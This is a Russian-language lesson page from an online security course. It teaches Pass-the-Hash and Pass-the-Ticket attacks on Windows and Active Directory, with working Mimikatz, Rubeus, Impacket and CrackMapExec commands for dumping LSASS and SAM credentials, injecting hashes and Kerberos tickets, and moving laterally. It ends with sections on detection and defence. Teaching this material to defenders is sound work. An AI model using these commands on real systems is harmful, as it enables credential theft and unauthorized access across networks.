0Pricing
Cyber Security Academy · Урок

Атаки Pass-the-Hash и Pass-the-Ticket

Используйте хеши учётных данных и билеты Kerberos для бокового перемещения без знания паролей в открытом виде.

«Атаки Pass-the-Hash и Pass-the-Ticket» — бесплатный урок Cyber Security Academy на CoddyKit. Это урок 2 из 4. Ты можешь прочитать весь урок бесплатно ниже — а потом практиковать его прямо в браузере с встроенным редактором кода и ИИ-репетитором 24/7. Это часть пути обучения Cyber Security Academy, и твой прогресс синхронизируется между веб-версией и приложением CoddyKit. Курс Cyber Security Academy содержит 4 уроков всего.

Почему существуют эти атаки

Протоколы учетных данных Windows хранят секреты аутентификации (хеши NTLM и билеты Kerberos) в памяти. Злоумышленник с привилегиями SYSTEM может извлечь эти секреты и повторно использовать их для аутентификации от имени других пользователей, не зная паролей.

Извлечение хешей NTLM с помощью Mimikatz

Mimikatz — ведущий инструмент для извлечения учетных данных в Windows. Запущенный с правами SYSTEM или администратора, он читает память процесса LSASS, извлекая хеши NTLM и учетные данные в открытом виде.

# Run mimikatz as Admin:
mimikatz.exe

# Enable debug privilege
privilege::debug

# Dump LSASS credentials
sekurlsa::logonpasswords

# Dump local SAM hashes
lsadump::sam

Передача хеша (PtH) с помощью Mimikatz

PtH внедряет хеш NTLM в новый сеанс, не требуя знания пароля в открытом виде. Хеш используется для аутентификации в удаленных службах по NTLM — это эффективно для горизонтального перемещения на другие узлы Windows.

# Pass-the-Hash with Mimikatz:
sekurlsa::pth /user:Administrator /domain:CORP \
  /ntlm:aad3b435b51404eeaad3b435b51404ee \
  /run:cmd.exe

# Opens cmd.exe authenticated as that user

Передача хеша с помощью Impacket

Impacket предоставляет инструменты Python для передачи хеша: psexec.py, smbexec.py и wmiexec.py принимают хеши NTLM напрямую для удаленного выполнения команд.

# psexec with hash (Linux → Windows)
psexec.py CORP/Administrator@192.168.1.100 \
  -hashes aad3b435...:8846f7eaee8fb117...

# wmiexec
wmiexec.py CORP/Admin@192.168.1.100 \
  -hashes :8846f7eaee8fb117ad06bdd830b7586c

Извлечение билетов Kerberos

Билеты Kerberos также хранятся в памяти LSASS. Mimikatz извлекает их, а Rubeus — специализированный инструмент для работы с билетами Kerberos в Windows.

# Mimikatz: export all tickets
sekurlsa::tickets /export

# Rubeus: list tickets
Rubeus.exe triage

# Rubeus: dump specific ticket
Rubeus.exe dump /luid:0x3e7 /service:krbtgt

Передача билета (PtT)

PtT внедряет украденный билет Kerberos в текущий сеанс. Билет выполняет аутентификацию в службах от имени своего исходного владельца — хеш или пароль не требуются.

# Mimikatz: inject ticket
kerberos::ptt ticket.kirbi

# Rubeus: inject ticket
Rubeus.exe ptt /ticket:ticket.kirbi

# Verify injection
klist

Удаленное извлечение LSASS

Получив точку опоры, извлеките дамп LSASS удаленно с помощью CrackMapExec или secretsdump из Impacket — интерактивный сеанс на целевом узле не нужен.

# CrackMapExec
crackmapexec smb 192.168.1.100 -u Admin -p Password123 --sam
crackmapexec smb 192.168.1.100 -u Admin -p Password123 --lsa

# Impacket secretsdump
secretsdump.py CORP/Admin:Password123@192.168.1.100

Пути горизонтального перемещения

Получив хеши или билеты, перемещайтесь по сети горизонтально: используйте PtH для доступа к другим компьютерам при повторном использовании локальных учетных данных администратора, PtT — для доступа к службам домена, а затем повышайте привилегии до уровня администратора домена, атакуя привилегированные учетные записи.

Обнаружение PtH и PtT

Защитники выявляют PtH по следующим признакам: событие ID 4624 (вход в систему) с типом входа 3 и без соответствующего интерактивного входа, аномалии аутентификации NTLM и сигнатуры Mimikatz в памяти или на диске.

# Detection event IDs:
# 4624: Logon (look for type 3 = network)
# 4776: NTLM auth (watch for unexpected hosts)
# 4769: Service ticket request (Kerberos)
# 4648: Explicit credential use

Меры защиты

Основные меры защиты: включите Credential Guard (он защищает LSASS с помощью виртуализации), ограничьте повторное использование локальных учетных записей администратора на разных компьютерах с помощью LAPS, включите привилегированные учетные записи в группу «Защищенные пользователи» и отключите NTLM, где это возможно.

Переход от хеша к Kerberos

Переход от хеша к Kerberos преобразует хеш NTLM в TGT Kerberos. Это полезно в средах, где NTLM заблокирован, но доступен Kerberos, или когда TGT нужен для дальнейших атак на Kerberos.

# Mimikatz: overpass-the-hash
sekurlsa::pth /user:Admin /domain:CORP \
  /ntlm:8846f7eaee8fb117ad06bdd830b7586c \
  /run:powershell.exe

# Then in new session:
Rubeus.exe asktgt /user:Admin /rc4:8846f7ea...

Быстрая проверка

Какая функция безопасности Windows защищает хранилище учетных данных LSASS с помощью виртуализации?

Итоги: передача хеша и билета

Передача хеша и передача билета лежат в основе горизонтального перемещения в Active Directory. Обе атаки используют кэширование учетных данных Windows в LSASS. Mimikatz и Impacket делают извлечение и повторное использование учетных данных простыми. Защищайтесь с помощью Credential Guard, LAPS, группы «Защищенные пользователи» и строгого мониторинга событий аутентификации NTLM и Kerberos.

Часто задаваемые вопросы

Урок «Атаки Pass-the-Hash и Pass-the-Ticket» бесплатный?

Да — полный текст урока «Атаки Pass-the-Hash и Pass-the-Ticket» бесплатно доступен здесь в веб-версии. Чтобы практиковать его интерактивно (встроенный редактор кода и ИИ-репетитор 24/7) и разблокировать остальной курс Cyber Security Academy, подпишись на CoddyKit PRO. Курс Cyber Security Academy содержит 4 уроков всего.

Чему я научусь в уроке «Атаки Pass-the-Hash и Pass-the-Ticket»?

Используйте хеши учётных данных и билеты Kerberos для бокового перемещения без знания паролей в открытом виде. Ты практикуешь Cyber Security Academy с помощью реального кода, который запускаешь прямо в браузере, и ИИ-репетитор 24/7 отвечает на твои вопросы во время урока.

Нужен ли мне опыт, чтобы начать Cyber Security Academy?

Предыдущий опыт не требуется. Cyber Security Academy на CoddyKit структурирован для всех уровней — от новичков до продвинутых, поэтому ты можешь начать отсюда или с самого начала и учиться в своем темпе. Это урок 2 из 4.

Сколько времени занимает урок «Атаки Pass-the-Hash и Pass-the-Ticket»?

Большинство уроков CoddyKit занимают около 5–10 минут. Каждый из них компактный и интерактивный, поэтому ты постоянно делаешь прогресс и продолжаешь с того же места в веб-версии и приложении.

Можно ли писать и запускать код в этом уроке Cyber Security Academy?

Да. Каждый урок Cyber Security Academy включает встроенный редактор кода, поэтому ты пишешь и запускаешь реальный код прямо в браузере и получаешь моментальную обратную связь от AI — локальная установка не требуется.

Все уроки этого курса

  1. Аутентификация Windows: NTLM и Kerberos
  2. Атаки Pass-the-Hash и Pass-the-Ticket
  3. Kerberoasting и AS-REP Roasting
  4. Защита Active Directory
← Назад к Cyber Security Academy